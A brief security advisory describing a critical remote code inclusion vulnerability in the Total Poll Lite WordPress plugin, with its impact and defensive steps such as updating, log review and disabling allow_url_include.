The Total Poll Lite WordPress plugin contains a critical Remote Code Inclusion vulnerability that allows unauthenticated attackers to execute arbitrary code on the host server.

This is a Remote Code Inclusion (RCI) vulnerability caused by the improper control of code generation within the totalpoll-lite component. An unauthenticated attacker can manipulate the plugin to include and execute remote files or malicious code strings.

RCI vulnerabilities are among the most severe, as they provide a direct path to Remote Code Execution (RCE). An attacker can take full control of the web server, deface the website, or use the server as a jumping-off point for further internal network attacks. The CVSS score of 9.9 reflects a near-maximum severity level.

Immediate Action: Immediately update Total Poll Lite to a version newer than 4.12.0. If no patch is available, deactivate and remove the plugin until a fix is released.

Proactive Monitoring: Check for the presence of unauthorized PHP files in the WordPress uploads directory and review logs for requests fetching remote assets.

Compensating Controls: Use a WAF to block requests containing external URLs in parameters and disable allow_url_include in the PHP configuration.

Public Exploit Available: No

The critical nature of this vulnerability (CVSS 9.9) necessitates immediate action. Organizations must update or remove this plugin immediately. RCI allows for total system takeover, making this the highest priority for WordPress administrators in this batch.